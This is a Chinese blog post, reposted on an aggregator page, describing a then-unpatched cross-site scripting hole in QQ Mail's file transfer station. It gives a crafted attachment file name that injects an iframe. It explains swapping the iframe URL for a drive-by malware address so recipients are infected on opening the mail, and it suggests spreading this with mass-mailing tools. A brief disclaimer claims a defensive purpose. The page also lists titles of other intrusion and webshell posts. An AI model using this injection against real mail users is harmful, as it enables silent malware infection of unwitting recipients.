惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

爱范儿
爱范儿
H
Help Net Security
Jina AI
Jina AI
T
The Blog of Author Tim Ferriss
宝玉的分享
宝玉的分享
博客园 - 叶小钗
Y
Y Combinator Blog
罗磊的独立博客
大猫的无限游戏
大猫的无限游戏
WordPress大学
WordPress大学
C
Check Point Blog
Recent Announcements
Recent Announcements
IT之家
IT之家
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
美团技术团队
云风的 BLOG
云风的 BLOG
雷峰网
雷峰网
H
Hackread – Cybersecurity News, Data Breaches, AI and More
S
SegmentFault 最新的问题
MyScale Blog
MyScale Blog
Apple Machine Learning Research
Apple Machine Learning Research
Microsoft Azure Blog
Microsoft Azure Blog
V
Visual Studio Blog
B
Blog

博客园 - %5C

MSSQL 2005 Backup log shell 新型下载者 基于时间差的SQL盲注技巧 跨站腳本攻擊(XSS):過濾不完的惡夢,又有新攻擊語法! 提权用的一个技巧 - %5C - 博客园 Microsoft SQL Server sqlvdir.dll ActiveX控件缓冲区溢出漏洞 关于php漏洞 渗透测试(Penetration Testing) 跨库也能差异备份 dedecms tag.php注入漏洞分析与利用工具 Phpcms 2007 远程文件包含漏洞 入侵的艺术(无线渗透) dedecms >=5 版本漏洞及使用方法 各版本ewebeditor快速拿webshell 某信息港入侵手记 MS Office Snapshot Viewer ActiveX Exploit (可执行版) Oracle web环境注射技术 SuperCMS 上传漏洞! Sql2005注射辅助脚本
QQ邮箱跨站漏洞0day - %5C - 博客园
%5C · 2008-09-12 · via 博客园 - %5C

09月10日QQ邮箱跨站漏洞

QQ邮箱跨站漏洞就是针对文件中转站
首先,打开我的QQ邮箱,用我自己的做测试...


如图一所示,打开我的QQ邮箱后,找到这个 文件中转站(1) 


如图二所示,
点...开始上传,,,,

这个地方写..

这是我们今天要利用的代码;
利用代码:【构造附件】
F:\pigerzhu<iframe src=http://http://www.hxhack.com%20width=800%20height=800/><%2Fiframe>XXS.rar

以上利用代码中的网址http://www.hxhack.com/可以换成你想要的网址,也可以替换成网马地址,这样对方一打开邮件,就会自动打开网马地址。
要是这个里面打开的网址被挂马?对方中马了都不知道吧。

其中的网址可以让你自由发挥,万一把里面的网址换成你的网马地址,再发给别人点击,对方就叫中马了。


如图三所示:
下面怎么办呢?

可以利用群发工具,,进行传播..我就不演示了,,我给自己发一份,,大家看下效果就可以了.


好,我们到收件箱看下..
呵呵,大家可以看到,我们的网站已经弹出来了...是的,就是这样...

大家千万不要利用来恶意搞破坏,发出来只是让大家更好的防护,而不是去搞破坏。

截止此文章发布的时候,漏洞依然存在,腾讯还没有补上这个漏洞。